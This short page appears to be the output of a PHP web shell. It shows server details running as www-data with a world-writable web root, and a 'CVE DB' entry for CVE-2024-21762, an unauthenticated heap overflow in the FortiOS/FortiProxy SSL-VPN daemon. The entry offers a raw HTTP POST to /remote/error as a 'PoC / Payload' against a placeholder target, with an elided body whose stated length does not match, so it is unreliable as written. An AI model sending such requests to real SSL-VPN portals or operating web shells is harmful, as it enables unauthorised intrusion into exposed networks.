Software: Apache/2.4.68 (Debian). PHP/8.2.33 uname -a: Linux 9d2024043b5d 7.0.12+kali-amd64 #1 SMP PREEMPT_DYNAMIC Kali 7.0.12-2kali1 uid=33(www-data) gid=33(www-data) groups=33(www-data) Safe-mode: OFF (not secure) /var/www/html/ drwxrwxrwx | |
|
[← Back to CVE DB] DescriptionOut-of-bounds write in the sslvpnd daemon of FortiOS/FortiProxy SSL-VPN. A crafted HTTP request triggers a heap overflow, giving unauthenticated remote code execution. Exploited in the wild against exposed SSL-VPN portals. PoC / Payload — CVE-2024-21762 POST /remote/error HTTP/1.1\nHost: TARGET\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 16\n\nlang=en;\xff..\xff.. |